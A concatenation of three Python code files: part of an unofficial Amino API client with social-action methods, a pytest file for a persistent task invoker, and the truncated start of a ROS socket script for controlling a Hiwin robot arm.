- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = requests.get(f"{self.api}/g/s/user-profile/{userId}?action=visit", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def send_coins(self, coins: int, blogId: str = None, chatId: str = None, objectId: str = None, transactionId: str = None):
url = None
if transactionId is None: transactionId = str(UUID(hexlify(urandom(16)).decode('ascii')))
data = {
"coins": coins,
"tippingContext": {"transactionId": transactionId},
"timestamp": int(timestamp() * 1000)
}
if blogId is not None: url = f"{self.api}/g/s/blog/{blogId}/tipping"
if chatId is not None: url = f"{self.api}/g/s/chat/thread/{chatId}/tipping"
if objectId is not None:
data["objectId"] = objectId
data["objectType"] = 2
url = f"{self.api}/g/s/tipping"
if url is None: raise exceptions.SpecifyType()
data = json.dumps(data)
response = requests.post(url, headers=headers.Headers(data=data).headers, data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def follow(self, userId: [str, list]):
"""
Follow an User or Multiple Users.
**Parameters**
- **userId** : ID of the User or List of IDs of the Users.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if isinstance(userId, str):
response = requests.post(f"{self.api}/g/s/user-profile/{userId}/member", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
elif isinstance(userId, list):
data = json.dumps({"targetUidList": userId, "timestamp": int(timestamp() * 1000)})
response = requests.post(f"{self.api}/g/s/user-profile/{self.userId}/joined", headers=headers.Headers(data=data).headers, data=data, proxies=self.proxies, verify=self.certificatePath)
else: raise exceptions.WrongType
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def unfollow(self, userId: str):
"""
Unfollow an User.
**Parameters**
- **userId** : ID of the User.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = requests.delete(f"{self.api}/g/s/user-profile/{userId}/member/{self.userId}", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def block(self, userId: str):
"""
Block an User.
**Parameters**
- **userId** : ID of the User.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = requests.post(f"{self.api}/g/s/block/{userId}", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def unblock(self, userId: str):
"""
Unblock an User.
**Parameters**
- **userId** : ID of the User.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = requests.delete(f"{self.api}/g/s/block/{userId}", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def join_community(self, comId: str, invitationId: str = None):
"""
Join a Community.
**Parameters**
- **comId** : ID of the Community.
- **invitationId** : ID of the Invitation Code.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = {"timestamp": int(timestamp() * 1000)}
if invitationId: data["invitationId"] = invitationId
data = json.dumps(data)
response = requests.post(f"{self.api}/x{comId}/s/community/join", data=data, headers=headers.Headers(data=data).headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def request_join_community(self, comId: str, message: str = None):
"""
Request to join a Community.
**Parameters**
- **comId** : ID of the Community.
- **message** : Message to be sent.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({"message": message, "timestamp": int(timestamp() * 1000)})
response = requests.post(f"{self.api}/x{comId}/s/community/membership-request", data=data, headers=headers.Headers(data=data).headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def leave_community(self, comId: str):
"""
Leave a Community.
**Parameters**
- **comId** : ID of the Community.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = requests.post(f"{self.api}/x{comId}/s/community/leave", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def flag_community(self, comId: str, reason: str, flagType: int, isGuest: bool = False):
"""
Flag a Community.
**Parameters**
- **comId** : ID of the Community.
- **reason** : Reason of the Flag.
- **flagType** : Type of Flag.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if reason is None: raise exceptions.ReasonNeeded
if flagType is None: raise exceptions.FlagTypeNeeded
data = json.dumps({
"objectId": comId,
"objectType": 16,
"flagType": flagType,
"message": reason,
"timestamp": int(timestamp() * 1000)
})
if isGuest: flg = "g-flag"
else: flg = "flag"
response = requests.post(f"{self.api}/x{comId}/s/{flg}", data=data, headers=headers.Headers(data=data).headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def edit_profile(self, nickname: str = None, content: str = None, icon: BinaryIO = None, backgroundColor: str = None, backgroundImage: str = None, defaultBubbleId: str = None):
"""
Edit account's Profile.
**Parameters**
- **nickname** : Nickname of the Profile.
- **content** : Biography of the Profile.
- **icon** : Icon of the Profile.
- **backgroundImage** : Url of the Background Picture of the Profile.
- **backgroundColor** : Hexadecimal Background Color of the Profile.
- **defaultBubbleId** : Chat bubble ID.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = {
"address": None,
"latitude": 0,
"longitude": 0,
"mediaList": None,
"eventSource": "UserProfileView",
"timestamp": int(timestamp() * 1000)
}
if nickname: data["nickname"] = nickname
if icon: data["icon"] = self.upload_media(icon, "image")
if content: data["content"] = content
if backgroundColor: data["extensions"] = {"style": {"backgroundColor": backgroundColor}}
if backgroundImage: data["extensions"] = {"style": {"backgroundMediaList": [[100, backgroundImage, None, None, None]]}}
if defaultBubbleId: data["extensions"] = {"defaultBubbleId": defaultBubbleId}
data = json.dumps(data)
response = requests.post(f"{self.api}/g/s/user-profile/{self.userId}", headers=headers.Headers(data=data).headers, data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def set_privacy_status(self, isAnonymous: bool = False, getNotifications: bool = False):
"""
Edit account's Privacy Status.
**Parameters**
- **isAnonymous** : If visibility should be Anonymous or not.
- **getNotifications** : If account should get new Visitors Notifications.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = {"timestamp": int(timestamp() * 1000)}
if not isAnonymous: data["privacyMode"] = 1
if isAnonymous: data["privacyMode"] = 2
if not getNotifications: data["notificationStatus"] = 2
if getNotifications: data["privacyMode"] = 1
data = json.dumps(data)
response = requests.post(f"{self.api}/g/s/account/visit-settings", headers=headers.Headers(data=data).headers, data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def set_amino_id(self, aminoId: str):
"""
Edit account's Amino ID.
**Parameters**
- **aminoId** : Amino ID of the Account.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({"aminoId": aminoId, "timestamp": int(timestamp() * 1000)})
response = requests.post(f"{self.api}/g/s/account/change-amino-id", headers=headers.Headers(data=data).headers, data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def get_linked_communities(self, userId: str):
"""
Get a List of Linked Communities of an User.
**Parameters**
- **userId** : ID of the User.
**Returns**
- **Success** : :meth:`Community List <amino.lib.util.objects.CommunityList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = requests.get(f"{self.api}/g/s/user-profile/{userId}/linked-community", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.CommunityList(json.loads(response.text)["linkedCommunityList"]).CommunityList
def get_unlinked_communities(self, userId: str):
"""
Get a List of Unlinked Communities of an User.
**Parameters**
- **userId** : ID of the User.
**Returns**
- **Success** : :meth:`Community List <amino.lib.util.objects.CommunityList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = requests.get(f"{self.api}/g/s/user-profile/{userId}/linked-community", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.CommunityList(json.loads(response.text)["unlinkedCommunityList"]).CommunityList
def reorder_linked_communities(self, comIds: list):
"""
Reorder List of Linked Communities.
**Parameters**
- **comIds** : IDS of the Communities.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({"ndcIds": comIds, "timestamp": int(timestamp() * 1000)})
response = requests.post(f"{self.api}/g/s/user-profile/{self.userId}/linked-community/reorder", headers=headers.Headers(data=data).headers, data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def add_linked_community(self, comId: str):
"""
Add a Linked Community on your profile.
**Parameters**
- **comId** : ID of the Community.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = requests.post(f"{self.api}/g/s/user-profile/{self.userId}/linked-community/{comId}", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def remove_linked_community(self, comId: str):
"""
Remove a Linked Community on your profile.
**Parameters**
- **comId** : ID of the Community.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = requests.delete(f"{self.api}/g/s/user-profile/{self.userId}/linked-community/{comId}", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def comment(self, message: str, userId: str = None, blogId: str = None, wikiId: str = None, replyTo: str = None):
"""
Comment on a User's Wall, Blog or Wiki.
**Parameters**
- **message** : Message to be sent.
- **userId** : ID of the User. (for Walls)
- **blogId** : ID of the Blog. (for Blogs)
- **wikiId** : ID of the Wiki. (for Wikis)
- **replyTo** : ID of the Comment to Reply to.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if message is None: raise exceptions.MessageNeeded
data = {
"content": message,
"stickerId": None,
"type": 0,
"timestamp": int(timestamp() * 1000)
}
if replyTo: data["respondTo"] = replyTo
if userId:
data["eventSource"] = "UserProfileView"
data = json.dumps(data)
response = requests.post(f"{self.api}/g/s/user-profile/{userId}/g-comment", headers=headers.Headers(data=data).headers, data=data, proxies=self.proxies, verify=self.certificatePath)
elif blogId:
data["eventSource"] = "PostDetailView"
data = json.dumps(data)
response = requests.post(f"{self.api}/g/s/blog/{blogId}/g-comment", headers=headers.Headers(data=data).headers, data=data, proxies=self.proxies, verify=self.certificatePath)
elif wikiId:
data["eventSource"] = "PostDetailView"
data = json.dumps(data)
response = requests.post(f"{self.api}/g/s/item/{wikiId}/g-comment", headers=headers.Headers(data=data).headers, data=data, proxies=self.proxies, verify=self.certificatePath)
else: raise exceptions.SpecifyType
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def delete_comment(self, commentId: str, userId: str = None, blogId: str = None, wikiId: str = None):
"""
Delete a Comment on a User's Wall, Blog or Wiki.
**Parameters**
- **commentId** : ID of the Comment.
- **userId** : ID of the User. (for Walls)
- **blogId** : ID of the Blog. (for Blogs)
- **wikiId** : ID of the Wiki. (for Wikis)
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if userId: response = requests.delete(f"{self.api}/g/s/user-profile/{userId}/g-comment/{commentId}", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
elif blogId: response = requests.delete(f"{self.api}/g/s/blog/{blogId}/g-comment/{commentId}", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
elif wikiId: response = requests.delete(f"{self.api}/g/s/item/{wikiId}/g-comment/{commentId}", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
else: raise exceptions.SpecifyType
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def like_blog(self, blogId: [str, list] = None, wikiId: str = None):
"""
Like a Blog, Multiple Blogs or a Wiki.
**Parameters**
- **blogId** : ID of the Blog or List of IDs of the Blogs. (for Blogs)
- **wikiId** : ID of the Wiki. (for Wikis)
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = {
"value": 4,
"timestamp": int(timestamp() * 1000)
}
if blogId:
if isinstance(blogId, str):
data["eventSource"] = "UserProfileView"
data = json.dumps(data)
response = requests.post(f"{self.api}/g/s/blog/{blogId}/g-vote?cv=1.2", headers=headers.Headers(data=data).headers, data=data, proxies=self.proxies, verify=self.certificatePath)
elif isinstance(blogId, list):
data["targetIdList"] = blogId
data = json.dumps(data)
response = requests.post(f"{self.api}/g/s/feed/g-vote", headers=headers.Headers(data=data).headers, data=data, proxies=self.proxies, verify=self.certificatePath)
else: raise exceptions.WrongType
elif wikiId:
data["eventSource"] = "PostDetailView"
data = json.dumps(data)
response = requests.post(f"{self.api}/g/s/item/{wikiId}/g-vote?cv=1.2", headers=headers.Headers(data=data).headers, data=data, proxies=self.proxies, verify=self.certificatePath)
else: raise exceptions.SpecifyType
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def unlike_blog(self, blogId: str = None, wikiId: str = None):
"""
Remove a like from a Blog or Wiki.
**Parameters**
- **blogId** : ID of the Blog. (for Blogs)
- **wikiId** : ID of the Wiki. (for Wikis)
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if blogId: response = requests.delete(f"{self.api}/g/s/blog/{blogId}/g-vote?eventSource=UserProfileView", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
elif wikiId: response = requests.delete(f"{self.api}/g/s/item/{wikiId}/g-vote?eventSource=PostDetailView", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
else: raise exceptions.SpecifyType
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def like_comment(self, commentId: str, userId: str = None, blogId: str = None, wikiId: str = None):
"""
Like a Comment on a User's Wall, Blog or Wiki.
**Parameters**
- **commentId** : ID of the Comment.
- **userId** : ID of the User. (for Walls)
- **blogId** : ID of the Blog. (for Blogs)
- **wikiId** : ID of the Wiki. (for Wikis)
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = {
"value": 4,
"timestamp": int(timestamp() * 1000)
}
if userId:
data["eventSource"] = "UserProfileView"
data = json.dumps(data)
response = requests.post(f"{self.api}/g/s/user-profile/{userId}/comment/{commentId}/g-vote?cv=1.2&value=1", headers=headers.Headers(data=data).headers, data=data, proxies=self.proxies, verify=self.certificatePath)
elif blogId:
data["eventSource"] = "PostDetailView"
data = json.dumps(data)
response = requests.post(f"{self.api}/g/s/blog/{blogId}/comment/{commentId}/g-vote?cv=1.2&value=1", headers=headers.Headers(data=data).headers, data=data, proxies=self.proxies, verify=self.certificatePath)
elif wikiId:
data["eventSource"] = "PostDetailView"
data = json.dumps(data)
response = requests.post(f"{self.api}/g/s/item/{wikiId}/comment/{commentId}/g-vote?cv=1.2&value=1", headers=headers.Headers(data=data).headers, data=data, proxies=self.proxies, verify=self.certificatePath)
else: raise exceptions.SpecifyType
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def unlike_comment(self, commentId: str, userId: str = None, blogId: str = None, wikiId: str = None):
"""
Remove a like from a Comment on a User's Wall, Blog or Wiki.
**Parameters**
- **commentId** : ID of the Comment.
- **userId** : ID of the User. (for Walls)
- **blogId** : ID of the Blog. (for Blogs)
- **wikiId** : ID of the Wiki. (for Wikis)
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if userId: response = requests.delete(f"{self.api}/g/s/user-profile/{userId}/comment/{commentId}/g-vote?eventSource=UserProfileView", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
elif blogId: response = requests.delete(f"{self.api}/g/s/blog/{blogId}/comment/{commentId}/g-vote?eventSource=PostDetailView", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
elif wikiId: response = requests.delete(f"{self.api}/g/s/item/{wikiId}/comment/{commentId}/g-vote?eventSource=PostDetailView", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
else: raise exceptions.SpecifyType
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def get_membership_info(self):
"""
Get Information about your Amino+ Membership.
**Parameters**
- No parameters required.
**Returns**
- **Success** : :meth:`Membership Object <amino.lib.util.objects.Membership>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = requests.get(f"{self.api}/g/s/membership?force=true", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.Membership(json.loads(response.text)).Membership
def get_ta_announcements(self, language: str = "en", start: int = 0, size: int = 25):
"""
Get the list of Team Amino's Announcement Blogs.
**Parameters**
- **language** : Language of the Blogs.
- ``en``, ``es``, ``pt``, ``ar``, ``ru``, ``fr``, ``de``
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`Blogs List <amino.lib.util.objects.BlogList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if language not in self.get_supported_languages(): raise exceptions.UnsupportedLanguage
response = requests.get(f"{self.api}/g/s/announcement?language={language}&start={start}&size={size}", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.BlogList(json.loads(response.text)["blogList"]).BlogList
def get_wallet_info(self):
"""
Get Information about the account's Wallet.
**Parameters**
- No parameters required.
**Returns**
- **Success** : :meth:`Wallet Object <amino.lib.util.objects.WalletInfo>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = requests.get(f"{self.api}/g/s/wallet", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.WalletInfo(json.loads(response.text)["wallet"]).WalletInfo
def get_wallet_history(self, start: int = 0, size: int = 25):
"""
Get the Wallet's History Information.
**Parameters**
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`Wallet Object <amino.lib.util.objects.WalletInfo>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = requests.get(f"{self.api}/g/s/wallet/coin/history?start={start}&size={size}", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.WalletHistory(json.loads(response.text)["coinHistoryList"]).WalletHistory
def get_from_deviceid(self, deviceId: str):
"""
Get the User ID from an Device ID.
**Parameters**
- **deviceID** : ID of the Device.
**Returns**
- **Success** : :meth:`User ID <amino.lib.util.objects.UserProfile.userId>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = requests.get(f"{self.api}/g/s/auid?deviceId={deviceId}")
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return json.loads(response.text)["auid"]
def get_from_code(self, code: str):
"""
Get the Object Information from the Amino URL Code.
**Parameters**
- **code** : Code from the Amino URL.
- ``http://aminoapps.com/p/EXAMPLE``, the ``code`` is 'EXAMPLE'.
**Returns**
- **Success** : :meth:`From Code Object <amino.lib.util.objects.FromCode>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = requests.get(f"{self.api}/g/s/link-resolution?q={code}", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.FromCode(json.loads(response.text)["linkInfoV2"]).FromCode
def get_from_id(self, objectId: str, objectType: int, comId: str = None):
"""
Get the Object Information from the Object ID and Type.
**Parameters**
- **objectID** : ID of the Object. User ID, Blog ID, etc.
- **objectType** : Type of the Object.
- *comId* : ID of the Community. Use if the Object is in a Community.
**Returns**
- **Success** : :meth:`From Code Object <amino.lib.util.objects.FromCode>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"objectId": objectId,
"targetCode": 1,
"objectType": objectType,
"timestamp": int(timestamp() * 1000)
})
if comId: response = requests.post(f"{self.api}/g/s-x{comId}/link-resolution", headers=headers.Headers(data=data).headers, data=data, proxies=self.proxies, verify=self.certificatePath)
else: response = requests.post(f"{self.api}/g/s/link-resolution", headers=headers.Headers(data=data).headers, data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.FromCode(json.loads(response.text)["linkInfoV2"]).FromCode
def get_supported_languages(self):
"""
Get the List of Supported Languages by Amino.
**Parameters**
- No parameters required.
**Returns**
- **Success** : :meth:`List of Supported Languages <List>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = requests.get(f"{self.api}/g/s/community-collection/supported-languages?start=0&size=100", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return json.loads(response.text)["supportedLanguages"]
def claim_new_user_coupon(self):
"""
Claim the New User Coupon available when a new account is created.
**Parameters**
- No parameters required.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = requests.post(f"{self.api}/g/s/coupon/new-user-coupon/claim", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def get_subscriptions(self, start: int = 0, size: int = 25):
"""
Get Information about the account's Subscriptions.
**Parameters**
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`List <List>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = requests.get(f"{self.api}/g/s/store/subscription?objectType=122&start={start}&size={size}", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return json.loads(response.text)["storeSubscriptionItemList"]
def get_all_users(self, start: int = 0, size: int = 25):
"""
Get list of users of Amino.
**Parameters**
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`User Profile Count List Object <amino.lib.util.objects.UserProfileCountList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = requests.get(f"{self.api}/g/s/user-profile?type=recent&start={start}&size={size}", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.UserProfileCountList(json.loads(response.text)).UserProfileCountList
def accept_host(self, chatId: str, requestId: str):
data = json.dumps({})
response = requests.post(f"{self.api}/g/s/chat/thread/{chatId}/transfer-organizer/{requestId}/accept", headers=headers.Headers(data=data).headers, data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def accept_organizer(self, chatId: str, requestId: str):
self.accept_host(chatId, requestId)
# Contributed by 'https://github.com/LynxN1'
def link_identify(self, code: str):
response = requests.get(f"{self.api}/g/s/community/link-identify?q=http%3A%2F%2Faminoapps.com%2Finvite%2F{code}", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
return json.loads(response.text)
def invite_to_vc(self, chatId: str, userId: str):
"""
Invite a User to a Voice Chat
**Parameters**
- **chatId** - ID of the Chat
- **userId** - ID of the User
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"uid": userId
})
response = requests.post(f"{self.api}/g/s/chat/thread/{chatId}/vvchat-presenter/invite/", headers=headers.Headers(data=data).headers, data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
|
test_persistent_invoker.py
|
import datetime
import threading
import time
import pytest
from edera import routine
from edera.exceptions import ExcusableError
from edera.invokers import PersistentInvoker
def test_invoker_runs_action_with_given_delay():
@routine
def append_current_timestamp():
counter[0] += 1
yield
timestamps.append(datetime.datetime.utcnow())
def audit():
if counter[0] > limit:
raise RuntimeError
timestamps = []
counter = [0]
limit = 3
delay = datetime.timedelta(seconds=1.0)
with pytest.raises(RuntimeError):
PersistentInvoker(append_current_timestamp, delay=delay).invoke[audit]()
assert len(timestamps) == limit
assert abs((timestamps[2] - timestamps[0]) - (limit - 1) * delay) < delay
def test_invoker_runs_action_forever():
def append_current_timestamp():
counter[0] += 1
raise ExcusableError("to be swallowed")
def audit():
if interrupted:
raise RuntimeError
counter = [0]
interrupted = False
delay = datetime.timedelta(seconds=0.1)
invoker = PersistentInvoker(append_current_timestamp, delay=delay)
invoker_thread = threading.Thread(target=invoker.invoke[audit])
invoker_thread.daemon = True
invoker_thread.start()
time.sleep(0.3)
assert invoker_thread.is_alive()
assert counter[0] >= 1
time.sleep(0.3)
assert invoker_thread.is_alive()
assert counter[0] >= 3
interrupted = True
time.sleep(0.3)
assert not invoker_thread.is_alive()
invoker_thread.join()
|
Hiwin_RT605_ArmCommand_Socket_20190627164039.py
|
#!/usr/bin/env python3
# license removed for brevity
import rospy
import os
import numpy as np
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
from std_msgs.msg import Int32MultiArray
import math
import enum
pos_feedback_times = 0
mode_feedback_times = 0
msg_feedback = 1
#接收策略端命令 用Socket傳輸至控制端電腦
import socket
##多執行序
import threading
import time
import sys
import matplotlib as plot
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
Socket = 0
data = '0' #設定傳輸資料初始值
Arm_feedback = 1 #假設手臂忙碌
NAME = 'socket_server'
##------------class pos-------
class point():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
pos = point(0,36.8,11.35,-90,0,0)
##------------class socket_cmd---------
class socket_data():
def __init__(self, grip, setvel, ra, delay, setboth, action,Speedmode):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
self.Speedmode = Speedmode
socket_cmd = socket_data(0,0,0,0,0,0,0)
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
raise StopIteration
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
##-----------client feedback arm state----------
class StateFeedback():
def _init_(self,ArmState,SentFlag):
self.ArmState = ArmState
self.SentFlag = SentFlag
state_feedback = StateFeedback(False,False)
def point_data(x,y,z,pitch,roll,yaw): ##接收策略端傳送位姿資料
pos.x = x
pos.y = y
pos.z = z
pos.pitch = pitch
pos.roll = roll
pos.yaw = yaw
##----------Arm Mode-------------###
def Arm_Mode(action,grip,ra,setvel,setboth): ##接收策略端傳送手臂模式資料
global arm_mode_flag
socket_cmd.action = action
socket_cmd.grip = grip
socket_cmd.ra = ra
socket_cmd.setvel = setvel
socket_cmd.setboth = setboth
arm_mode_flag = True
Socket_command()
##-------Arm Speed Mode------------###
def Speed_Mode(speedmode): ##接收策略端傳送手臂模式資料
global speed_mode_flag
socket_cmd.Speedmode = speedmode
# def Grip_Mode(req): ##接收策略端傳送夾爪動作資料
# socket_cmd.grip = int('%s'%req.grip)
# return(1)
def socket_talker(): ##創建Server node
pub = rospy.Publisher('chatter', Int32, queue_size=10)
rospy.init_node(NAME)
rate = rospy.Rate(10) # 10hz
while not rospy.is_shutdown():
# hello_str = "hello world %s" % rospy.get_time()
state = Int32()
state.data = 1
# rospy.loginfo(state)
pub.publish(state)
rate.sleep()
# a = rospy.Service('arm_mode',arm_mode, Arm_Mode) ##server arm mode data
# s = rospy.Service('arm_pos',arm_data, point_data) ##server arm point data
# b = rospy.Service('speed_mode',speed_mode, Speed_Mode) ##server speed mode data
#c = rospy.Service('grip_mode',grip_mode, Grip_Mode) ##server grip mode data
print ("Ready to connect")
#rospy.spin() ## spin one
##------------server 端 end-------
##----------socket 封包傳輸--------------##
##---------------socket 傳輸手臂命令-----------------
def Socket_command():
global arm_mode_flag,speed_mode_flag,point_data_flag
if arm_mode_flag == True:
arm_mode_flag = False
for case in switch(socket_cmd.action):
#-------PtP Mode--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
